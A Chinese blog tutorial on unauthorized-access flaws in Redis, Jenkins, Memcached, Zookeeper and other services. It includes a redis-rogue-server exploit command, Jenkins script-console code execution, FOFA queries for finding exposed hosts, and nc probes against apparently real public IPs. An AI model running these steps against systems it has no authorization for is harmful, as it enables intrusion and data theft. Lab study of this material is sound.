未授权访问漏洞系列

已于 2024-08-05 11:58:34 修改
阅读量275 收藏 1
点赞数 4
分类专栏: 未授权访问 文章标签: 安全
于 2024-08-05 00:05:05 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ineedmoreMuQ/article/details/140914573
版权

环境

1.此漏洞需要靶场vulhub,可自行前往gethub下载

2.需要虚拟机或云服务器等linux系统,并在此系统安装docker和docker-compose提供环境支持

3.运行docker-compose指令为docker-compose up -d即可运行当前目录下的文件

Redis未授权访问漏洞

一、进入vulhub启动docker镜像

cd /vulhub-master/redis/4-unacc

启动docker

二、在系统安装redis,见上图

redis链接6379为redis的默认端口

redis-cli -h 192.168.4.176 -p 6379

即可链接成功

三、可以直接连接执行命令且不需要认证说明存在未授权访问漏洞----->下载以下攻击项目…

 git clone https://github.com/n0b0dyCN/redis-rogue-server.git

四、使用py脚本攻击redis

python3 redis-rogue-server.py --rhost 192.168.30.138 --lhost 192.168.30.129

博主只有一台云服务器连不上,不想搞两个linux系统了,这个实验先这样吧

MongoDB未授权访问漏洞

拉取镜像:docker pull mongo
启动镜像docker run -d -p 27017:27017  mongo
查看镜像:docker ps -a

漏洞利用

使用Navicat进行连接.

实例 可以在fofo里搜索 port="27017",去找一个连一下试一试,不过别犯法了

Memcached未授权访问漏洞

下载Memcached程序并执行以下命令---->启动Memcached漏洞环境

下载地址:
https://www.runoob.com/memcached/window-install-memcached.html
#执行命令
memcached.exe -d install
memcached.exe -d start

步骤二使用Telnet程序探测目标的11211端口.

#Telnet探测
telnet 192.168.4.199 11211
#操作命令
stats //查看memcache服务状态
stats items //查看所有items
stats cachedump 390//获得缓存key
get:state:264861539228401373:261588//通过key读取相应value获得实际缓存内容,造
成敏感信息泄露

用fofa语法 port="11211"搜索

Zookeeper未授权访问漏洞

port="2181"搜索资产

可以使用以下语句

echo envi | nc 114.242.175.75 2181
echo envi | nc 223.5.253.242 2181

使用Zookeeper可视化管理工具进行连接

#工具下载
https://issues.apache.org/jira/secure/attachment/12436620/ZooInspector.zip

Jenkins未授权访问漏洞

使用以下fofa语法进行产品搜索

port="8080" && app="JENKINS" && title=="Dashboard [Jenkins]"

在打开的URL中.点击 Manage Jenkins–>Scritp Console 在执行以下命令

#执行命令
println "whoami".execute().text  
#命令执行页面
http://125.63.109.2:8080/manage/script/index.php

靶场复现流程

wget http://archives.jenkins-ci.org/redhat/jenkins-1.620-1.1.noarch.rpm
下载

rpm -ivh jenkins-1.620-1.1.noarch.rpm
安装
service jenkins start
启动
关防火墙
systemctl stop firewalld.service

访问服务地址

http://1.92.134.1:8080/manage
http://1.92.134.1:8080/script

#执行命令
println "whoami".execute().text

Elasticsearch未授权访问漏洞

搜索语法

"Elasticsearch" && port="9200"

存在未授权访问则直接进入到信息页面…不需要输入用户密码登陆

#访问测试
http://localhost:9200/_plugin/head/web管理界面
http://localhost:9200/cat/indices
http://localhost:9200/river/search 查看数据库敏感信息
http://localhost:9200/nodes查看节点数据

Kibana未授权访问漏洞

搜索语句

"kibana" && port="5601"

无需登录访问即存在未授权访问漏洞

Docker Remote APl未授权访问漏洞

port="8080" && app="Kubernetes"

ineedmoreMuQ
关注
  • 4
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
授权访问漏洞系列详解
Jz031212的博客
08-05 1375
而我们这章的主题Kibana担任视图层角色,拥有各种维度的查询和分析并使用图形化的界面展示存放在Elasticsearch中的数据。2.使用TLS认证修改docker swarm的认证方式,使用TLS认证:Overview Swarm with TLS 和 Configure DockerSwarm for TLS这两篇文档,说的是配置好TLS后,Docker CLl在发送命令到docker daemon之前,会首先发送它的证书,如果证书是由daemon信任的CA所签名的,才可以继续执行。
授权访问漏洞系列详解①!
muyuchen110的博客
08-04 2125
【代码】授权访问漏洞系列详解!
授权访问漏洞系列详解②!
muyuchen110的博客
08-04 539
【代码】授权访问漏洞系列详解②!
授权访问漏洞系列详解③!
muyuchen110的博客
08-05 1099
【代码】授权访问漏洞系列详解③!
授权访问漏洞系列详解⑧!
muyuchen110的博客
08-05 511
授权访问漏洞系列详解⑧!
02-Redis授权访问漏洞
qq_57410330的博客
07-16 971
详谈redis授权访问漏洞,原理、利用及加固方式
授权访问漏洞系列详解⑦!
muyuchen110的博客
08-05 428
【代码】授权访问漏洞系列详解⑦!
授权访问漏洞系列详解④!
muyuchen110的博客
08-05 697
授权访问漏洞系列详解⑤!
授权访问漏洞系列详解⑤!
muyuchen110的博客
08-05 485
【代码】授权访问漏洞系列详解④!
授权访问漏洞
2201_75572825的博客
08-08 1154
授权访问漏洞是指攻击者可以在不经过身份验证或授权的情况下,访问网站的敏感资源或功能.这种漏洞通常发生在网站没有正确实施访问控制机制或存在安全配置错误的情况下,导致可以让任意用户或者限制访问用户可以访问到内部敏感信息。
ZooKeeper 授权访问漏洞处理方法
08-31
### ZooKeeper 授权访问漏洞处理方法 #### 一、漏洞背景及原理 **ZooKeeper** 是一个分布式的协调服务框架,它提供了一种高效可靠的解决方案来管理和维护分布式环境中不同节点之间的同步与协调问题。然而,由于...
授权访问漏洞总结
墨鱼菜鸡
07-28 316
目录 一、MongoDB 授权访问漏洞 二、Redis 授权访问漏洞 三、Memcached 授权访问漏洞CVE-2013-7239 四、JBOSS 授权访问漏洞 五、VNC 授权访问漏洞 六、Docker 授权访问漏洞 七、ZooKeeper 授权访问漏洞 八、Rsync ...
网安漏洞知识系列:spring boot授权访问及Swagger漏洞处理
weixin_54626591的博客
07-19 854
spring boot授权访问及Swagger漏洞处理
【1day】金和OA某接口存在授权访问漏洞
记录并分享学习安全的知识点..
12-07 813
软件,旨在提供高效的办公流程管理和协作解决方案。它提供了一系列功能和工具,帮助企业实现办公自动化、信息共享和团队协作。金和OA存在授权访问漏洞,攻击者可以通过某种方式绕过身份验证机制,直接访问应用程序或系统的敏感资源或功能,从而获取敏感信息或进行恶意操作的一种漏洞。金和OA是一款企业级。
第146天:内网安全-Web权限维持&各语言内存马&Servlet-api类&Spring类&Agent类
最新发布
weixin_71529930的博客
09-10 714
然后访问http://ip/,这里会卡住,把之前创建的index文件会被删除,后面的页面是我访问的缓存,同时会产生一个.HH.php文件,这个文件是linux的隐藏文件,但是不知为何,我linux搭建的访问不了,只能这样演示。在我去删除的时候,他又会立刻去创建出来,甚至在我鼠标右键的时候因为这个文件不断地创建,右键页面也不能打开,从时间也可以看出来这个文件,在一直的刷新。后面换成了小迪视频里面的冰蝎版本,视频中问题是木马不能再Upload目录下,这里我试了也不行,所以这个还是有很多的bug的。
快速失败 (fail-fast) 和安全失败 (fail-safe)
Flying_Fish_roe的博客
09-07 690
快速失败是一种系统设计原则,当系统遇到异常情况或错误时,立即停止执行并返回错误,而不是试图继续执行或处理潜在的问题。快速失败系统会主动检测系统中的问题,并尽早报告错误,以防止错误进一步传播或导致更大的问题。在快速失败系统中,当检测到某些异常条件或不一致时,系统立即抛出异常或错误,停止当前操作并通知用户或开发者。这种机制通常用于防止错误堆积,使得系统可以快速恢复到正常状态,并尽早解决问题。快速失败的核心思想是“及早报告、及早修复”。通过尽早暴露错误,开发者能够更容易地定位问题,减少问题在系统中的蔓延。
【JAVA】Tomcat性能优化、安全配置、资源控制以及运行模式超详细
A的博客
09-09 1465
nio(new I/O),是Java SE 1.4及后续版本提供的一种新的I/O操作方式(即java.nio包及其子包)。Java nio是一个基于缓冲区、并能提供非阻塞I/O操作的Java API,因此nio也被看成是non-blocking I/O的缩写。
网站安全需求分析与安全保护工程
weixin_49171105的博客
09-09 485
网站:是基于B/S技术架构的综合信息服务平台,主要提供网页信息及业务后台对外接口服务。
注册安全分析报告:熊猫频道
Explinks的博客
09-10 371
熊猫频道作为央视的子频道, 采用的还是老一代的图形验证码已经落伍了, 用户体验一般,容易被破解, 一旦被国际黑客发起攻击,将会对老百姓形成骚扰,影响声誉。很多人在短信服务刚开始建设的阶段,可能不会在安全方面考虑太多,理由有很多。比如:“需求这么赶,当然是先实现功能啊”,“业务量很小啦,系统就这么点人用,不怕的” , “我们怎么会被盯上呢,不可能的”等等。有一些理由虽然有道理,但是该来的总是会来的。前期欠下来的债,总是要还的。越早还,问题就越小,损失就越低。
zookeeper授权访问漏洞
05-01
Zookeeper是一个开源的分布式协调服务,它主要用于分布式系统中的配置管理、命名服务、同步服务和集群控制等方面。然而,在使用Zookeeper时,存在一个授权访问漏洞。这个漏洞可以让攻击者通过授权的方式获取Zookeeper的敏感信息,从而导致系统的失效和安全性问题。 当攻击者利用这个漏洞时,他们可以轻松地访问Zookeeper节点和数据,而不需要任何授权和认证。这意味着攻击者可以轻松地查看节点上的数据、更改配置和控制集群,甚至可以对节点执行恶意操作,从而导致系统完全失效。 为了避免这个漏洞对系统造成的影响,我们需要采取一系列措施来保护Zookeeper。首先,我们需要设置Zookeeper的访问控制,通过用户名和密码来限制对节点的访问。其次,我们需要对节点进行加密,确保敏感信息不被泄露。最后,我们需要确保Zookeeper的软件版本是最新的,并且及时修补漏洞。 总之,Zookeeper授权访问漏洞是一个存在风险的漏洞,需要我们重视。我们需要采取多重措施来保护Zookeeper节点的安全,防止攻击者利用漏洞造成的损失。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值